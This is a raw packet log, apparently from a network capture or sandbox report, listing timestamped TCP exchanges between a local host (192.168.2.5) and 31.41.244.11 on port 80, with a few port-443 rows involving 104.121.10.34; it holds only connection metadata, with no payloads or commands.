Dec 17, 2024 06:03:23.939912081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.940872908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.940988064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.940998077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.941076994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.941976070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.942080975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.942081928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.942199945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.943104029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.943171978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.943242073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.943295002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.944190979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.944295883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.944308043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.944361925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.945307970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.945400000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.945415020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.945477962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.946450949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.946552038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.946578026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.946611881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.947541952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.947638035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.947658062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.947729111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.948648930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.948739052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.948762894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.948803902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.949771881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.949868917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.949882984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.949955940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.950886965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.950958967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.951025009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.951066017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.951983929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.952024937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.952100992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.952152967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.953121901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.953178883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.953253984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.953474998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.954200029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.954260111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.954277039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.954478979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.955332041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.955382109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.955435991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.955641985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.956428051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.956480980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.956552029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.956680059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.957566977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.957693100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.957714081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.957753897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.958658934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.958766937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.958794117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.958832979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.959789038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.959855080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.959897041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.959950924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.960907936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.961019039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.961029053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.961158037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.962018013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.962070942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.962119102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.962227106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.963150978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.963207006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.963229895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.963290930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.964241982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.964313984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.964354038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.964404106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.965369940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.965456009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.965492010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.965559006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.966454983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.966557980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.966806889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.966806889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.967591047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.967679024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.967694044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.967726946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.968673944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.968722105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.968786955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.968853951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.969815016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.969861031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.969902992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.969950914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.970933914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.971014977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.971066952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.971113920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.972055912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.972099066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.972151041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.972199917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.973171949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.973248005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.973277092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.973330021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.974267006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.974329948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.974385977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.974438906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.975378036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.975425959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.975486994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.975533962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.976563931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.976608992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.976644993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.976705074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.977590084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.977632999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.977705956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.977772951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.978712082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.978760004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.978799105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.978843927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.979829073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.979918957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.979954004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.980000019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.980972052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.981024027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.981056929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.981106997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.982384920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.982458115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.982492924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.982603073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.983200073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.983212948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.983306885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.984548092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.984599113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.984601021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.984674931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.985421896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.985488892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.119200945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.119303942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.119379997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.119465113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.119709969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.119786024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.119795084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.119858980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.120796919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.121078968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.121231079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.121284008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.121362925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.121421099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.122350931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.122404099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.122407913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.122471094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.123441935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.123562098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.123600006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.123639107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.124560118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.124654055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.124716997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.124794006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.125689030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.125777006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.125806093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.125889063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.126768112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.126866102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.126907110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.126980066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.127897024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.127964020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.128009081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.128129959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.129012108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.129067898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.129132032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.129210949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.130112886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.130203962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.130243063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.130312920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.131252050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.131316900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.131382942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.131467104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.132363081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.132450104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.132469893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.132545948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.133128881 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.133209944 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.133512020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.133546114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.133589029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.133589029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.134593010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.134689093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.134701967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.134761095 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.134790897 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.134845018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.135138988 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.135694981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.135762930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.135803938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.135879040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.136472940 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:24.136836052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.136950970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.136970043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.137041092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.137917995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.138015985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.138025045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.138096094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.139045954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.139178038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.139219999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.139293909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.140144110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.140270948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.140274048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.140369892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.141393900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.141468048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.141546011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.141607046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.142370939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.142445087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.142524958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.142612934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.143488884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.143579960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.143623114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.143681049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.144618034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.144722939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.144747972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.144788027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.145716906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.145797014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.145807028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.145859003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.146838903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.146923065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.146977901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.147075891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.147968054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.148020029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.148083925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.148147106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.149086952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.149213076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.149287939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.149287939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.150171995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.150280952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.150300026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.150391102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.151284933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.151331902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.151416063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.151472092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.152398109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.152496099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.152510881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.152616024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.153512001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.153563023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.153641939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.153712034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.154628992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.154715061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.154772043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.154853106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.155728102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.155843019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.155869961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.155960083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.156850100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.156991005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.156997919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.157062054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.157973051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.158026934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.158138990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.158250093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.159096003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.159197092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.159209013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.159332037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.160187960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.160305977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.160326004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.160392046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.161315918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.161381006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.161431074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.161478996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.162414074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.162467957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.162509918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.162509918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.163537025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.163609028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.163664103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.163733006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.164683104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.164717913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.164764881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.164764881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.165767908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.165858984 CET	80	49850	31.41.244.11	192.168.2.5
